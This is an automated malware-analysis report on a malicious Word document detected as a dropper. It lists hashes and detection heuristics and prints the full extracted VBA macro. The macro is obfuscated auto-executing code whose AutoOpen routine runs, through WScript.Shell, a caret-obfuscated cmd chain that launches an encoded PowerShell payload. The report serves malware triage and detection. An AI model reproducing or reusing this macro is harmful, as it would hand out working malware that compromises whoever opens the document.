Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 8504ad891d9af936…

MALICIOUS

Office (OLE)

81.1 KB Created: 2018-08-24 06:45:00 Authoring application: Microsoft Office Word First seen: 2020-05-14
MD5: 2fd2cccdba02a125bbedca1cb217387c SHA-1: a26ac7fc79eafcfaf8c98b33e3f88dd58ec76cf1 SHA-256: 8504ad891d9af93640a44744c9a4f3c00bfb2f2fabdd99dab9cbc19c6d3873a8
310 Risk Score

Heuristics 10

  • ClamAV: Doc.Dropper.Valyria-6665595-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Valyria-6665595-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    NtLmiKwO = CreateObject("WScript.Shell") _
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    NtLmiKwO = CreateObject("WScript.Shell") _
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10584 bytes
SHA-256: 0eee9c760f8f49623ff34a60a6db5dfd8c7d617e0b6879626e1cf64fc24c4636
Detection
ClamAV: No threats found
Obfuscation or payload: likely
144 of 226 identifiers look randomly generated (e.g. 'znLKzJzoudlYA'); 3 string-concatenation chain(s) — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "znLKzJzoudlYA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "ApWzUKnRosNSQ"
Function AAQTwY()
On Error Resume Next
Error TsBOk * PzbIr / EGIrlR * tBdawp
   Error 80496 * XVtGNU / GJcGUz / ibFhc
   Error cdirr / ApSFY * Jcsqw * cVpkE
   Error mGlMo / iRXmB * KVjkTi / 41263
azsTMArRGVs = "Md /V^" + " " + "^ " + "^" + "   /" + "c   " + " " + Chr(0 + 2 + 1 + 4 + 27) + "  ^se^t"
Error 86001 * uXftQL
   Error 65237 / 51968 * vRDLS / MCftpY
   Error YnNiX / fbfhw
   Error 48347 * BOrfwL * 84365 / lCSPk
iPhLN = "  ^ ^ ^" + " ^6^bv" + "=AACA^g" + "^A^A" + "IAAC^" + "A^gA^"
Error CnWmM * zdJdWH
   Error 49727 * KwZVd
TqkZmJPM = "A^" + "I^A^AC^" + "A^g^AA" + "^I^" + "A^A" + "CA^" + "g^" + "A^" + "AI^A^A"
Error wAFiQf * BqYLln * 4118 * sPcUD
   Error IXMki / hjHdFJ * 78225 * IFmzEB
TcNlBV = "CA^g^AA" + "^IA" + "ACA^gA^" + "Qf^A" + "0H^A7^B" + "AaA^M^" + "G^A0" + "^B^QY^" + "AMG" + "A" + "9^B^wOA"
Error AMbLf * UBoFn
   Error DwGwti / hUhntR
   Error 13147 * IrBXkJ
HKPspJlirRN = "s^" + "G^AhB" + "QZ^AIHA" + "^" + "i^Bw^OA" + "^M"
Error zMPHSO / VaqFs
   Error qaVcff / SOavXR
   Error 58038 * RhbBl
   Error FvRXf * hTUOGX * TbTjj * 93335
jCjmN = "F^AuB" + "^g^" + "YA^" + "QC^A^" + "g^" + "A^Qb^" + "A^" + "UGA^0B^" + "Q" + "^S^A^0" + "C^" + "A" + "^lB"
Error nUPbIH / OZHWz
   Error 13590 / 28029
   Error YGvni * oMuwWP
   Error jiHTJ / BwhfM
   Error 40892 / zzWLc
lPzsiUdjqEQ = "^w" + "^aA^8" + "GA2^B^g" + "^bA" + "^" + "k" + "EA7A" + "^QKA" + "^" + "M"
Error zGbKQV / csXGZ
   Error 87085 / PHUAFb * 4769 / ztAtM
   Error 36167 / FKjnQf
   Error dKDTwP / 87355 / MQRjw / 59626
   Error 78720 / pYzJNh
bskdYj = "F^A" + "^uBg^YA" + "QCAg" + "A^AL" + "A0E^A" + "vB^Q" + "W^AQC" + "AoA^QZA" + "^w^GA^" + "p^B^"
Error QjXvXi / kzihv
   Error lbRPcK * DvQAjj
LzahjSi = "g" + "R^A^Q" + "G^Ah^B" + "wbAwG^A" + "u^" + "B^wdA8" + "G^AEB" + "g^LAo^"
Error 60966 * 19933 * qOcFY / 41213
NYAswfQFLbJ = "G^A^U" + "^BQ^WA" + "QC^A^7^" + "BQ^" + "eAIHA" + "^" + "0Bw^eA" + "^kC" + "^AM" + "BgQ" + "^AM^E^A" + "^kA^A^I" + "A^4^"
AAQTwY = azsTMArRGVs + iPhLN + TqkZmJPM + TcNlBV + HKPspJlirRN + jCjmN + lPzsiUdjqEQ + bskdYj + LzahjSi + NYAswfQFLbJ
   Error 24984 * rRluP * uPGhpV * csNWw
   Error XlHpE * isSCK / BQOGk / kWWls
   Error QBwsp * kiPMHJ
End Function
Function nkWaqCkJW()
On Error Resume Next
Error 30627 / 23549 * vltwpz / 58476
   Error TRzrF / IwoQfR
   Error jGXzl / QvpFK / pEFBwD * hUnNl
sDmuNHIlkD = "GA^p^B" + "^AI^A" + "0^E" + "AvBQW^A" + "QC^Ao" + "^AAaA" + "^M" + "G^A^h"
Error apOMFp / zjdbzE / 15638 * Llfiz
   Error VGXvhi / GknLC * 26645 * YjnzhW
   Error 78341 * SmtsmV * AVzDM / GrZhj
nzHbKrHiLqL = "^BQZ" + "^A^I" + "HAvBgZ^" + "A^s" + "^DAnA" + "QZ" + "AgHAl" + "B^gLAcC" + "^Ar^Ag^" + "W^" + "Ak^"
Error 46393 / IGjjo
KVZpGBEDc = "F^A" + "^i^B^" + "AJ^AsC" + "^A" + "n^" + "A"
Error 32301 * cdiRna * sRipjN * IQrdpb
   Error 88762 / kTGMpt
   Error pdUIoJ / FZatn / 72944 / utmEr
   Error MOPBq * 49662
TAvChlzrOmB = "^AX" + "AcC^" + "ArAwY^" + "A^" + "kG" + "A^s" + "B" + "^g^YAU^" + "HAwB^gO" + "A^Y"
Error lWMNv * ihfzzh * KzhXd * wiSqU
   Error 63377 * hILzF
sKhNblmb = "H" + "A^u^" + "BQZA^QC" + "A^9A" + "wU" + "A^4G" + "Ai" + "B" + "AJ^" + "A" + "s" + "^D^AnAA" + "N^AI^D^"
Error npbTj * FmUPwt
   Error OlmmO / CDWXw / ZkTKb / oSwib
OiavjV = "A" + "^yAw" + "J^A" + "A" + "C^A9" + "A^AI" + "^Ao^F^A" + "^ZB^g^Y" + "^AQC" + "^" + "A7A^QKA" + "cC^" + "A"
Error Gvjiar * KjzOYY / 71240 * hJmkX
   Error 90558 / mttInl / 41436 * cjiorr
   Error MGcJb * tNOHO * TqZjJz / abakq
   Error iEVXRQ * YGqFSM * 14861 / cMMSvl
XGiIIZ = "^A^B" + "^wJ" + "AgC" + "^A" + "^0^B^Q" + "aA^" + "wG^Aw^" + "Bw^U^A" + "4CAn^" + "AQM"
Error 70985 / UTpcZ
XUiaiIu = "^" + "Ac^H^" + "A0" + "^A^gMAo" + "^FA^" + "H^BgN^"
Error OOHBK / ZOtCDw
   Error 39691 / UoqMM / 15239 / GicoWz
   Error 84126 * AiEHRa
YKsCf = "A8C^AvB" + "g" + "b^A4CA^" + "z^B" + "wb^A" + "w^G^A" + "lBAaA4" + "CA0^Bw"
nkWaqCkJW = sDmuNHIlkD + nzHbKrHiLqL + KVZpGBEDc + TAvChlzrOmB + sKhNblmb + OiavjV + XGiIIZ + XUiaiIu + YKsCf
   Error lkFrvz / NdKjvW / tWrsOF / 2650
   Error ClsvGv * IrRjG
   Error AlXNP / BDLNzi * zJikWz / vUrAWW
   Error fpQoDw * 98003
   Error zzYcj / EuOfw / AtwzDZ / uJvNjj
End Function
Function TGYwfRXiBE()
On Error Resume Next
Error 92496 / HhOKYW
   Error 3840 / luArSm
   Error 58475 / iHufa
BcCJa = "c^" + "AUGA" + "0BwL" + "^" + "A^8" + "C^A^" + "6A^" + "AcA^Q^H" + "^A"
Error 94287 / vKatG
   Error 17260 / SnnRN * lWrwA / RWsrQQ
   Error 51186 * suoLPD
   Error 19923 / zWLXo / 33197 / wmcLS
ARANGbrCiE = "0" + "BA^a^A^" + "A^EA^1" + "^Bw^LA" + "^" + "8G^" + "Aj^B^" + "gL" + "^" + "A^0G" + "A" + "v^" + "Bw^Y"
Error 85374 / YJlct * QzwfNz / 37867
   Error 76858 * AculvC * 13974 * sWcMY
SknmGwAZaX = "A4C" + "AuBw" + "bAk" + "G^" + "A^0^B"
Error STwjTc * mLGvjH
   Error 15567 * cYqwod
   Error 22503 / iKdjLc
   Error 41828 / ZjWzD * 48960 * jFVqDz
AwIjbj = "w" + "YA^U^GA" + "^0^BwbA" + "I^H^A" + "^wB^wb^" + "A^kGA" + "2^Bw" + "^"
Error 61894 / cuwFzp / 74399 / zLbGcN
   Error aMADYW * CoYEG * 31105 * sdPdw
   Error ZJNlkG / 12477
   Error jwjAIL / sOmkF
HvRKw = "LA" + "^8C^A6^" + "A^AcAQ" + "H^A" + "^" + "0"
Error RtrciW * 25040 / 46961 * lLkNM
   Error Pzbtf / ufomz / EfjRn * rKFhv
jYHPjrPX = "B" + "A^a" + "^" + "A^A^EA0" + "^A^wZ" + "^Aw^E^A" + "vA^Q^b" + "^A^8^G" + "Aj" + "B^" + "gLA"
Error RIBZE / ESSBcP / 29444 / BcINQC
OZthQwavt = "Y" + "H^A^l^" + "BAZ^" + "A^gGA" + "z^" + "B^Qa^A4" + "^G^Av" + "^B"
Error 31256 * csuVha * mRAPnw * MLnKQ
   Error 69825 / zCJHE / nqBMsR / MnilrJ
   Error 96541 / 28716
HIMdrUv = "^A^d^A4" + "CA^" + "l" + "Bw" + "ZAEG" + "^" + "Aw" + "B^" + "Q" + "^" + "Z^A^0^" + "G^A" + "v^B^Aa"
Error 60768 * AFOsov * 99612 * vsMZW
   Error 98497 / wDvfOA / EYYLu * ijubH
   Error 66292 * IXwRdR
   Error LVPqW * PTAiA
AqupuREt = "^A0C" + "A^4^B^Q" + "YA" + "Q" + "^HA"
Error QjFIM * RzOvQ
cRjNNBOVr = "6B^w" + "^bA^8" + "C^" + "Av^A^g" + "^O" + "^AAH^A" + "0B^A^d"
Error 62363 * 96432
   Error idiMDw / nRUbb
   Error 94648 * QoHNM / 40289 * mFOHT
FAGWO = "^A" + "^gG^AA" + "BA^T^As" + "G^AyAw^" + "YA^"
TGYwfRXiBE = BcCJa + ARANGbrCiE + SknmGwAZaX + AwIjbj + HvRKw + jYHPjrPX + OZthQwavt + HIMdrUv + AqupuREt + cRjNNBOVr + FAGWO
   Error iVmzRD * 54111
End Function
Function CZwToYDn()
On Error Resume Next
Error 75329 * VvopW
   Error PjBZkB / iqcwv / dRrlGp * 52389
   Error 96081 * jtaKzJ
   Error sRUKm * Jkkin
AjWifqfQiS = "I" + "^G^A0A^" + "w" + "^L" + "A"
Error 18551 * KXDED
   Error OTRuUf * rPUsM
TWnopnuq = "UHAlBg" + "L" + "^A" + "MH^A^" + "y^B^Q^d" + "A^8^" + "GA^s^" + "B^wb^A" + "MG^Au" + "^B^Q"
Error 16055 / iRbWF
   Error 83519 / pWcQmv
lJdHKZbNL = "^ZA^YH" + "^A^lB" + "wcA^4" + "C^Ak^B" + "^A^" + "bA^kG" + "A1B^gY" + "^AE"
Error 62754 / DBtsF
   Error tSTUm * mBFZm * NbVcjF / CuETPz
   Error aHZmMz * LaYPCT
   Error 27268 / WSTTki
hXUQrwsksTw = "G" + "Ay^BQZA" + "QH" + "A" + "v^A"
Error 74118 * bfowD * GIMuf * 74580
   Error QPuDQC * 57386
zlNOAfa = "^wLA" + "^oD" + "A^" + "wB^" + "A^d" + "^AQ^HA" + "^" + "oBA^Q^"
Error 44287 * 94885
   Error MKsiLz / WRWbU
   Error KdTBjs / CUnVwk / 57692 * 28144
   Error 85966 / jYFTj
   Error BHutw / MUmWH
NXFErTT = "AkH" + "^AvA" + "^Qb" + "A8" + "^" + "GA^j^B^" + "g^LAE^" + "G^A^2" + "^B" + "^Qa^A" + "Q" + "H^A^"
Error 26009 / nKpFM
   Error aHSFa / zDMJG
   Error 94259 / iCcUl
FQUXDrdZ = "yB" + "w^b^AAH" + "^A^l" + "^B" + "^" + "AZ^AE" + "G^Aw^" + "Bw"
Error 21010 * lwnDHj / 17576 / zFWvz
   Error hEHNk * qlPcjI
   Error 76265 * XaBGZG
   Error qUDvG * aaiVob
IFuapz = "^b^A^" + "I" + "^H" + "^AuBwb^" + "AkGA^" + "o^Bwc^" + "A^EG^" + "A^" + "mB^Q^" + "Y" + "^A^" + "k^GA^t^"
Error EFfIXW * bvdYO
   Error 72242 / JMsIL * AAPmn / HRhNou
   Error XAfFOk * DizLqG
UsbwCTso = "B^wL^" + "A^8C^" + "A^6A" + "^A" + "cAQ" + "H^A0" + "^B" + "^A^a^A" + "c" + "CA9AAT" + "A^I^E^" + "A^" + "D"
CZwToYDn = AjWifqfQiS + TWnopnuq + lJdHKZbNL + hXUQrwsksTw + zlNOAfa + NXFErTT + FQUXDrdZ + IFuapz + UsbwCTso
   Error WANvA / jwjPjq / 43879 * MVcUB
End Function
Function ZAZFaKiQqLI()
On Error Resume Next
Error 80663 / 52489 / 92614 * wNRwBM
   Error UijZR / DOPwf
   Error PmLfN / vUDiX * 13554 * kwVrM
JFSLiBTWW = "BA^JA" + "s" + "DA^0" + "Bgb^A^U" + "G"
Error HhBqP / FjbHD / lMQvGp * AwkGmN
pVUjzo = "^A" + "pBA^b" + "^" + "A^MEA^" + "iB" + "^Q" + "Z^" + "Ac^F" + "Au^A" + "A^d" + "^A" + "^UGA"
Error 64274 / 9052
mCikrYI = "O^BAIA^" + "Q" + "^HA" + "^" + "jB^Q^Z^" + "AoGA" + "iB^w" + "bA0" + "C^A^3^" + "B^Q^"
Error 38954 * cdPUAw
   Error 8101 / iBbGs / 43240 * HhhQlj
   Error oDZVc / rzTrp * VdWaO * KBYbVD
TswpwBjJ = "Z^A" + "^4^GA9A" + "^" + "g^aA^Q" + "^F" + "AZ^B^A^" + "J^ ^e^" + "-" + " ^l^l^" + "e" + "^hs"
Error NNDPzG * FXmOjN / 65262 * lYMIw
   Error wuYVpt * saloqH / 80473 * oJcNWi
DQTzsvVbI = "rew^o" + "^p&   " + " ^f^O" + "r /^L  " + "%^w ^i" + "n ( " + "^1" + "^013^ ^" + "  ^ -^1" + "^" + " ^ ^  " + "0)^D"
ZAZFaKiQqLI = JFSLiBTWW + pVUjzo + mCikrYI + TswpwBjJ + DQTzsvVbI
   Error uzMfN / HntcQ / qiRuH / McrXaf
End Function
Function UkMWDn()
On Error Resume Next
Error jjVCq * IaphSf / dBwfY * ziKSO
kfRnUt = "^O  s" + "^e^t ^m" + "^bS=!^" + "m^bS!!^" + "6^bv:~ " + "   %^w" + ", 1!" + "&" + "^I^f" + "  " + "%^w =="
Error YXZjZd / bDXZa
   Error auGjlZ * 41408
   Error 66380 / bNoAJ
TfpJmjlLn = "  " + "^" + "0  C^" + "A^l" + "L" + " %" + "^m^bS" + ":^*" + "^mbS^" + "!^"
Error iziZpr / FmQaiR * AKNvwZ * tBpIlW
   Error wFjDQA * BjCzYF / 96990 / PajEZD
   Error NhwLYA * maDJp
   Error IiUjQ * 50180 * qiELl * vpREVv
JiKzIjTtOE = "=" + "%  " + "  " + Chr(0 + 2 + 1 + 4 + 27) + "    "
UkMWDn = kfRnUt + TfpJmjlLn + JiKzIjTtOE
   Error iTtwuY * rpjzit * oEGYN * 43002
End Function


Attribute VB_Name = "YBEISfwZXXh"
Sub AutoOpen()
On Error Resume Next
   Error rONqm * CJQtzO
   Error 48152 * NBlXc
   Error 21614 * wbHaSs * DfiWX / wlfjDM
NtLmiKwO = CreateObject("WScript.Shell") _
. _
Run _
(ChrW(12 + 4 + 7 + 5 + 39) + OhrOYobRKQ + NukjzBt + AAQTwY + nkWaqCkJW + TGYwfRXiBE + CZwToYDn + ZAZFaKiQqLI + UkMWDn + XINXMRiRpSFu + IvhiVpbowuUMTR, 462569852 - 462569852)
   Error ZJiKS * zwNLP * 82992 / 82141
   Error 50357 * OhnqYd / LWwAUw * KXvbkQ
End Sub